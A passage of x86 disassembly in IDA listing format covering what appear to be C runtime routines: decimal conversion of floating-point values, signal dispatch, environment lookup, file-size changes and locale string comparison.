loc_419F82: ; CODE XREF: sub_419DB1+1B8�j
; sub_419DB1+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_419FDF
mov [ebp+arg_C], ecx
loc_419F92: ; CODE XREF: sub_419DB1+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_4197BE
lea eax, [ebp+var_10]
push eax
call sub_4197BE
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_419760
lea eax, [ebp+var_10]
push eax
call sub_4197BE
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_419F92
mov eax, [ebp+arg_14]
loc_419FDF: ; CODE XREF: sub_419DB1+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41A01C
loc_419FEC: ; CODE XREF: sub_419DB1+248�j
cmp eax, ecx
jb short loc_419FFF
cmp byte ptr [eax], 39h
jnz short loc_419FFB
mov byte ptr [eax], 30h
dec eax
jmp short loc_419FEC
; ---------------------------------------------------------------------------
loc_419FFB: ; CODE XREF: sub_419DB1+242�j
cmp eax, ecx
jnb short loc_41A003
loc_419FFF: ; CODE XREF: sub_419DB1+23D�j
inc eax
inc word ptr [ebx]
loc_41A003: ; CODE XREF: sub_419DB1+24C�j
inc byte ptr [eax]
loc_41A005: ; CODE XREF: sub_419DB1+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41A014: ; CODE XREF: sub_419DB1+F0�j
mov eax, [ebp+var_4]
loc_41A017: ; CODE XREF: sub_419DB1+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A01C: ; CODE XREF: sub_419DB1+239�j
; sub_419DB1+275�j
cmp eax, ecx
jb short loc_41A02C
cmp byte ptr [eax], 30h
jnz short loc_41A028
dec eax
jmp short loc_41A01C
; ---------------------------------------------------------------------------
loc_41A028: ; CODE XREF: sub_419DB1+272�j
cmp eax, ecx
jnb short loc_41A005
loc_41A02C: ; CODE XREF: sub_419DB1+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_41A03B: ; CODE XREF: sub_419DB1+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_41A017
sub_419DB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A044 proc near ; CODE XREF: sub_4155EC+33ED�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_41A0AB
dec eax
dec eax
jz short loc_41A09C
sub eax, 4
jz short loc_41A09C
sub eax, 3
jz short loc_41A09C
sub eax, 4
jz short loc_41A08F
sub eax, 6
jz short loc_41A082
dec eax
jz short loc_41A075
or eax, 0FFFFFFFFh
jmp loc_41A16D
; ---------------------------------------------------------------------------
loc_41A075: ; CODE XREF: sub_41A044+27�j
mov esi, ds:dword_45FB1C
mov eax, offset dword_45FB1C
jmp short loc_41A0B6
; ---------------------------------------------------------------------------
loc_41A082: ; CODE XREF: sub_41A044+24�j
mov esi, ds:dword_45FB18
mov eax, offset dword_45FB18
jmp short loc_41A0B6
; ---------------------------------------------------------------------------
loc_41A08F: ; CODE XREF: sub_41A044+1F�j
mov esi, ds:dword_45FB20
mov eax, offset dword_45FB20
jmp short loc_41A0B6
; ---------------------------------------------------------------------------
loc_41A09C: ; CODE XREF: sub_41A044+10�j
; sub_41A044+15�j ...
push edi
call sub_41A171
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_41A0B6
; ---------------------------------------------------------------------------
loc_41A0AB: ; CODE XREF: sub_41A044+C�j
mov esi, ds:dword_45FB14
mov eax, offset dword_45FB14
loc_41A0B6: ; CODE XREF: sub_41A044+3C�j
; sub_41A044+49�j ...
cmp esi, 1
jnz short loc_41A0C2
xor eax, eax
jmp loc_41A16D
; ---------------------------------------------------------------------------
loc_41A0C2: ; CODE XREF: sub_41A044+75�j
test esi, esi
jnz short loc_41A0CD
push 3
call sub_4125D8
loc_41A0CD: ; CODE XREF: sub_41A044+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_41A0DF
cmp edi, 0Bh
jz short loc_41A0DF
cmp edi, 4
jnz short loc_41A105
loc_41A0DF: ; CODE XREF: sub_41A044+8F�j
; sub_41A044+94�j
mov ebx, ds:dword_45F8F4
and ds:dword_45F8F4, 0
cmp edi, ecx
jnz short loc_41A134
mov edx, ds:dword_42E7EC
mov ds:dword_42E7EC, 8Ch
mov [ebp+arg_0], edx
jmp short loc_41A108
; ---------------------------------------------------------------------------
loc_41A105: ; CODE XREF: sub_41A044+99�j
mov ebx, [ebp+arg_0]
loc_41A108: ; CODE XREF: sub_41A044+BF�j
cmp edi, ecx
jnz short loc_41A134
mov eax, ds:dword_42E7E0
mov ecx, ds:dword_42E7E4
add ecx, eax
cmp eax, ecx
jge short loc_41A13B
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:42E770h[edx*4]
loc_41A129: ; CODE XREF: sub_41A044+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_41A129
jmp short loc_41A13B
; ---------------------------------------------------------------------------
loc_41A134: ; CODE XREF: sub_41A044+AA�j
; sub_41A044+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_41A149
loc_41A13B: ; CODE XREF: sub_41A044+D7�j
; sub_41A044+EE�j
push ds:dword_42E7EC
push 8
call esi
pop ecx
pop ecx
jmp short loc_41A157
; ---------------------------------------------------------------------------
loc_41A149: ; CODE XREF: sub_41A044+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_41A157
cmp edi, 4
jnz short loc_41A16A
loc_41A157: ; CODE XREF: sub_41A044+103�j
; sub_41A044+10C�j
cmp edi, 8
mov ds:dword_45F8F4, ebx
jnz short loc_41A16A
mov eax, [ebp+arg_0]
mov ds:dword_42E7EC, eax
loc_41A16A: ; CODE XREF: sub_41A044+111�j
; sub_41A044+11C�j
xor eax, eax
pop ebx
loc_41A16D: ; CODE XREF: sub_41A044+2C�j
; sub_41A044+79�j
pop edi
pop esi
pop ebp
retn
sub_41A044 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A171 proc near ; CODE XREF: sub_41A044+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_42E7E8
cmp ds:dword_42E76C, edx
push esi
mov eax, offset dword_42E768
jz short loc_41A19F
lea esi, [ecx+ecx*2]
lea esi, ds:42E768h[esi*4]
loc_41A193: ; CODE XREF: sub_41A171+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41A19F
cmp [eax+4], edx
jnz short loc_41A193
loc_41A19F: ; CODE XREF: sub_41A171+16�j
; sub_41A171+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:42E768h[ecx*4]
cmp eax, ecx
jnb short loc_41A1B3
cmp [eax+4], edx
jz short locret_41A1B5
loc_41A1B3: ; CODE XREF: sub_41A171+3B�j
xor eax, eax
locret_41A1B5: ; CODE XREF: sub_41A171+40�j
retn
sub_41A171 endp
; =============== S U B R O U T I N E =======================================
sub_41A1B6 proc near ; CODE XREF: seg000:00418BA5�p
arg_0 = dword ptr 4
cmp ds:dword_460EA8, 0
push ebx
push esi
mov esi, ds:dword_45F86C
push edi
jz short loc_41A22D
test esi, esi
jnz short loc_41A1E7
cmp ds:dword_45F874, esi
jz short loc_41A22D
call sub_41A654
test eax, eax
jnz short loc_41A22D
mov esi, ds:dword_45F86C
test esi, esi
jz short loc_41A22D
loc_41A1E7: ; CODE XREF: sub_41A1B6+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_41A22D
push ebx
call sub_410B60
pop ecx
mov edi, eax
loc_41A1F8: ; CODE XREF: sub_41A1B6+6D�j
mov eax, [esi]
test eax, eax
jz short loc_41A22D
push eax
call sub_410B60
cmp eax, edi
pop ecx
jbe short loc_41A220
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_41A220
push edi
push ebx
push eax
call sub_41A615
add esp, 0Ch
test eax, eax
jz short loc_41A225
loc_41A220: ; CODE XREF: sub_41A1B6+51�j
; sub_41A1B6+59�j
add esi, 4
jmp short loc_41A1F8
; ---------------------------------------------------------------------------
loc_41A225: ; CODE XREF: sub_41A1B6+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_41A22F
; ---------------------------------------------------------------------------
loc_41A22D: ; CODE XREF: sub_41A1B6+10�j
; sub_41A1B6+1C�j ...
xor eax, eax
loc_41A22F: ; CODE XREF: sub_41A1B6+75�j
pop edi
pop esi
pop ebx
retn
sub_41A1B6 endp
; ---------------------------------------------------------------------------
loc_41A233: ; CODE XREF: sub_4192E6+271�p
push ebp
mov ebp, esp
mov eax, 1000h
call sub_410BE0
push ebx
mov ebx, [ebp+8]
push esi
xor esi, esi
cmp ebx, ds:dword_460C60
jnb loc_41A368
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_460B60[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_41A368
push 1
push esi
push ebx
call sub_4169A2
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+8], eax
jz loc_41A372
push 2
push esi
push ebx
call sub_4169A2
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_41A372
push edi
mov edi, [ebp+0Ch]
sub edi, eax
test edi, edi
jle short loc_41A315
push 1000h
lea eax, [ebp-1000h]
push esi
push eax
call sub_410590
push 8000h
push ebx
call sub_41A6C2
add esp, 14h
mov [ebp+0Ch], eax
loc_41A2C9: ; CODE XREF: seg000:0041A2F0�j
mov eax, 1000h
cmp edi, eax
jge short loc_41A2D4
mov eax, edi
loc_41A2D4: ; CODE XREF: seg000:0041A2D0�j
push eax
lea eax, [ebp-1000h]
push eax
push ebx
call sub_417DAC
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41A2F2
sub edi, eax
test edi, edi
jle short loc_41A308
jmp short loc_41A2C9
; ---------------------------------------------------------------------------
loc_41A2F2: ; CODE XREF: seg000:0041A2E8�j
cmp ds:dword_45F848, 5
jnz short loc_41A305
mov ds:dword_45F844, 0Dh
loc_41A305: ; CODE XREF: seg000:0041A2F9�j
or esi, 0FFFFFFFFh
loc_41A308: ; CODE XREF: seg000:0041A2EE�j
push dword ptr [ebp+0Ch]
push ebx
call sub_41A6C2
pop ecx
pop ecx
jmp short loc_41A355
; ---------------------------------------------------------------------------
loc_41A315: ; CODE XREF: seg000:0041A2A4�j
jge short loc_41A355
push 0
push dword ptr [ebp+0Ch]
push ebx
call sub_4169A2
push ebx
call sub_419252
add esp, 10h
push eax
call near ptr 3D0000h
adc ecx, [ebx+1BDEF7F0h]
div bh
fimul word ptr [esi-7Dh]
; ---------------------------------------------------------------------------
dd 1575FFFEh, 0F84405C7h, 0D0045h, 15FF0000h, 41C068h
dd 45F848A3h
db 0
; ---------------------------------------------------------------------------
loc_41A355: ; CODE XREF: seg000:0041A313�j
; seg000:loc_41A315�j
push 0
push dword ptr [ebp+8]
push ebx
call sub_4169A2
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41A375
; ---------------------------------------------------------------------------
loc_41A368: ; CODE XREF: seg000:0041A24D�j
; seg000:0041A269�j
mov ds:dword_45F844, 9
loc_41A372: ; CODE XREF: seg000:0041A281�j
; seg000:0041A296�j
or eax, 0FFFFFFFFh
loc_41A375: ; CODE XREF: seg000:0041A366�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A379 proc near ; CODE XREF: sub_419DB1+165�p
; sub_41A599+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41A579
cmp cx, 7FFFh
jnb loc_41A579
cmp dx, 0BFFDh
ja loc_41A579
cmp dx, 3FBFh
ja short loc_41A3E2
xor eax, eax
jmp short loc_41A41C
; ---------------------------------------------------------------------------
loc_41A3E2: ; CODE XREF: sub_41A379+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41A404
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_41A404
xor eax, eax
cmp [esi+4], eax
jnz short loc_41A406
cmp [esi], eax
jnz short loc_41A406
jmp loc_41A573
; ---------------------------------------------------------------------------
loc_41A404: ; CODE XREF: sub_41A379+71�j
; sub_41A379+79�j
xor eax, eax
loc_41A406: ; CODE XREF: sub_41A379+80�j
; sub_41A379+84�j
cmp cx, ax
jnz short loc_41A429
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41A429
cmp [ebx+4], eax
jnz short loc_41A429
cmp [ebx], eax
jnz short loc_41A429
loc_41A41C: ; CODE XREF: sub_41A379+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41A594
; ---------------------------------------------------------------------------
loc_41A429: ; CODE XREF: sub_41A379+90�j
; sub_41A379+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_41A439: ; CODE XREF: sub_41A379+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41A48D
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_41A455: ; CODE XREF: sub_41A379+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41973F
add esp, 0Ch
test eax, eax
jz short loc_41A480
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_41A480: ; CODE XREF: sub_41A379+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_41A455
loc_41A48D: ; CODE XREF: sub_41A379+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41A439
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41A4D0
loc_41A4AB: ; CODE XREF: sub_41A379+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_41A4C9
lea eax, [ebp+var_24]
push eax
call sub_4197BE
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_41A4AB
loc_41A4C9: ; CODE XREF: sub_41A379+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41A509
loc_41A4D0: ; CODE XREF: sub_41A379+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41A509
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_41A4E9: ; CODE XREF: sub_41A379+184�j
test byte ptr [ebp+var_24], 1
jz short loc_41A4F2
inc [ebp+var_14]
loc_41A4F2: ; CODE XREF: sub_41A379+174�j
lea eax, [ebp+var_24]
push eax
call sub_4197EC
dec ebx
pop ecx
jnz short loc_41A4E9
cmp [ebp+var_14], 0
jz short loc_41A509
or byte ptr [ebp+var_24], 1
loc_41A509: ; CODE XREF: sub_41A379+155�j
; sub_41A379+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_41A520
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41A555
loc_41A520: ; CODE XREF: sub_41A379+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41A552
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_41A54D
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_41A547
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_41A555
; ---------------------------------------------------------------------------
loc_41A547: ; CODE XREF: sub_41A379+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_41A555
; ---------------------------------------------------------------------------
loc_41A54D: ; CODE XREF: sub_41A379+1B5�j
inc [ebp+var_20+2]
jmp short loc_41A555
; ---------------------------------------------------------------------------
loc_41A552: ; CODE XREF: sub_41A379+1AB�j
inc [ebp+var_24+2]
loc_41A555: ; CODE XREF: sub_41A379+1A5�j
; sub_41A379+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41A579
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_41A573: ; CODE XREF: sub_41A379+86�j
mov [esi+0Ah], ax
jmp short loc_41A594
; ---------------------------------------------------------------------------
loc_41A579: ; CODE XREF: sub_41A379+42�j
; sub_41A379+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41A594: ; CODE XREF: sub_41A379+AB�j
; sub_41A379+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A379 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A599 proc near ; CODE XREF: sub_4198E0+440�p
; sub_419DB1+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_42EC60
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_41A612
jge short loc_41A5C1
mov eax, [ebp+arg_4]
mov ebx, offset dword_42EDC0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_41A5C1: ; CODE XREF: sub_41A599+16�j
cmp [ebp+arg_8], ecx
jnz short loc_41A5CC
mov eax, [ebp+arg_0]
mov [eax], cx
loc_41A5CC: ; CODE XREF: sub_41A599+2B�j
cmp [ebp+arg_4], ecx
jz short loc_41A612
push esi
push edi
loc_41A5D3: ; CODE XREF: sub_41A599+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_41A60B
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_41A5FE
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_41A5FE: ; CODE XREF: sub_41A599+57�j
push esi
push [ebp+arg_0]
call sub_41A379
pop ecx
pop ecx
xor ecx, ecx
loc_41A60B: ; CODE XREF: sub_41A599+49�j
cmp [ebp+arg_4], ecx
jnz short loc_41A5D3
pop edi
pop esi
loc_41A612: ; CODE XREF: sub_41A599+14�j
; sub_41A599+36�j
pop ebx
leave
retn
sub_41A599 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A615 proc near ; CODE XREF: sub_41A1B6+5E�p
; sub_41AB3C+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_41A622
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A622: ; CODE XREF: sub_41A615+7�j
push ds:dword_460C64
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push ds:dword_460E84
call loc_41A738
add esp, 1Ch
test eax, eax
jnz short loc_41A64F
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A64F: ; CODE XREF: sub_41A615+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_41A615 endp
; =============== S U B R O U T I N E =======================================
sub_41A654 proc near ; CODE XREF: sub_41A1B6+1E�p
; sub_41A9B5+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, ds:dword_45F874
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_41A6B5
mov ebx, ds:dword_41C11C
loc_41A66D: ; CODE XREF: sub_41A654+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_41A6BD
push ebp
call sub_410C0F
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_41A6BD
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_41A6BD
push edi
push [esp+18h+var_4]
call sub_41A9B5
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_41A66D
loc_41A6B5: ; CODE XREF: sub_41A654+11�j
xor eax, eax
loc_41A6B7: ; CODE XREF: sub_41A654+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41A6BD: ; CODE XREF: sub_41A654+29�j
; sub_41A654+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_41A6B7
sub_41A654 endp
; =============== S U B R O U T I N E =======================================
sub_41A6C2 proc near ; CODE XREF: seg000:0041A2BE�p
; seg000:0041A30C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_460C60
jnb short loc_41A729
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_460B60[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_41A729
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41A702
and cl, 7Fh
jmp short loc_41A70F
; ---------------------------------------------------------------------------
loc_41A702: ; CODE XREF: sub_41A6C2+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41A71D
or cl, 80h
loc_41A70F: ; CODE XREF: sub_41A6C2+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A71D: ; CODE XREF: sub_41A6C2+48�j
mov ds:dword_45F844, 16h
jmp short loc_41A733
; ---------------------------------------------------------------------------
loc_41A729: ; CODE XREF: sub_41A6C2+B�j
; sub_41A6C2+27�j
mov ds:dword_45F844, 9
loc_41A733: ; CODE XREF: sub_41A6C2+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_41A6C2 endp
; ---------------------------------------------------------------------------
loc_41A738: ; CODE XREF: sub_41A615+27�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41CC00
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor ebx, ebx
cmp ds:dword_45FB2C, ebx
push 1
pop edi
jnz short loc_41A7AB
push edi
mov eax, offset dword_41C850
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_41C008 ; CompareStringW
test eax, eax
jz short loc_41A788
mov ds:dword_45FB2C, edi
jmp short loc_41A7AB
; ---------------------------------------------------------------------------
loc_41A788: ; CODE XREF: seg000:0041A77E�j
push edi
mov eax, offset dword_42F3E4
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_41C00C ; CompareStringA
test eax, eax
jz loc_41A9A1
mov ds:dword_45FB2C, 2
loc_41A7AB: ; CODE XREF: seg000:0041A769�j
; seg000:0041A786�j
mov esi, [ebp+14h]
cmp esi, ebx
jle short loc_41A7C2
push esi
push dword ptr [ebp+10h]
call sub_416DB8
pop ecx
pop ecx
mov esi, eax
mov [ebp+14h], esi
loc_41A7C2: ; CODE XREF: seg000:0041A7B0�j
cmp [ebp+1Ch], ebx
jle short loc_41A7D7
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
call sub_416DB8 ; CODE XREF: seg000:0041A847�j
pop ecx
pop ecx
mov [ebp+1Ch], eax
loc_41A7D7: ; CODE XREF: seg000:0041A7C5�j
mov eax, ds:dword_45FB2C
cmp eax, 2
jnz short loc_41A7FC
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_41C00C ; CompareStringA
jmp loc_41A9A3
; ---------------------------------------------------------------------------
loc_41A7FC: ; CODE XREF: seg000:0041A7DF�j
cmp eax, edi
jnz loc_41A9A1
cmp [ebp+20h], ebx
jnz short loc_41A811
mov eax, ds:dword_45F8E0
mov [ebp+20h], eax
loc_41A811: ; CODE XREF: seg000:0041A807�j
cmp esi, ebx
jz short loc_41A81E
cmp [ebp+1Ch], ebx
jnz loc_41A8B6
loc_41A81E: ; CODE XREF: seg000:0041A813�j
cmp esi, [ebp+1Ch]
jnz short loc_41A82B
loc_41A823: ; CODE XREF: seg000:0041A874�j
; seg000:0041A8A5�j
push 2
loc_41A825: ; CODE XREF: seg000:0041A87E�j
pop eax
jmp loc_41A9A3
; ---------------------------------------------------------------------------
loc_41A82B: ; CODE XREF: seg000:0041A821�j
cmp [ebp+1Ch], edi
jle short loc_41A837
loc_41A830: ; CODE XREF: seg000:0041A889�j
; seg000:0041A891�j ...
mov eax, edi
jmp loc_41A9A3
; ---------------------------------------------------------------------------
loc_41A837: ; CODE XREF: seg000:0041A82E�j
cmp esi, edi
jg short loc_41A87C
lea eax, [ebp-3Ch]
push eax
push dword ptr [ebp+20h]
call near ptr 3D0000h
jl short near ptr loc_41A7CD+1
ror byte ptr [edi], 84h
push ecx
add [eax], eax
add [ebx], bh
rep jle short loc_41A880
cmp dword ptr [ebp-3Ch], 2
jb short loc_41A87C
lea eax, [ebp-36h]
cmp [ebp-36h], bl
jz short loc_41A87C
loc_41A862: ; CODE XREF: seg000:0041A87A�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_41A87C
mov ecx, [ebp+10h]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_41A876
cmp cl, dl
jbe short loc_41A823
loc_41A876: ; CODE XREF: seg000:0041A870�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_41A862
loc_41A87C: ; CODE XREF: seg000:0041A839�j
; seg000:0041A858�j ...
push 3
jmp short loc_41A825
; ---------------------------------------------------------------------------
loc_41A880: ; CODE XREF: seg000:0041A851�j
cmp [ebp+1Ch], ebx
jle short loc_41A8B6
cmp dword ptr [ebp-3Ch], 2
jb short loc_41A830
lea eax, [ebp-36h]
cmp [ebp-36h], bl
jz short loc_41A830
loc_41A893: ; CODE XREF: seg000:0041A8AF�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_41A830
mov ecx, [ebp+18h]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_41A8AB
cmp cl, dl
jbe loc_41A823
loc_41A8AB: ; CODE XREF: seg000:0041A8A1�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_41A893
jmp loc_41A830
; ---------------------------------------------------------------------------
loc_41A8B6: ; CODE XREF: seg000:0041A818�j
; seg000:0041A883�j
push ebx
push ebx
push esi
push dword ptr [ebp+10h]
push 9
push dword ptr [ebp+20h]
call ds:dword_41C120 ; MultiByteToWideChar
mov [ebp-1Ch], eax
cmp eax, ebx
jz loc_41A9A1
mov [ebp-4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_410BE0
mov [ebp-18h], esp
mov eax, esp
mov [ebp-24h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_41A905
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
xor ebx, ebx
mov [ebp-24h], ebx
or dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp+14h]
push 1
pop edi
loc_41A905: ; CODE XREF: seg000:0041A8ED�j
cmp [ebp-24h], ebx
jz loc_41A9A1
push dword ptr [ebp-1Ch]
push dword ptr [ebp-24h]
push esi
push dword ptr [ebp+10h]
push edi
push dword ptr [ebp+20h]
mov esi, ds:dword_41C120
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_41A9A1
push ebx
push ebx
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push 9
push dword ptr [ebp+20h]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp-20h], esi
cmp esi, ebx
jz short loc_41A9A1
mov [ebp-4], edi
lea eax, [esi+esi]
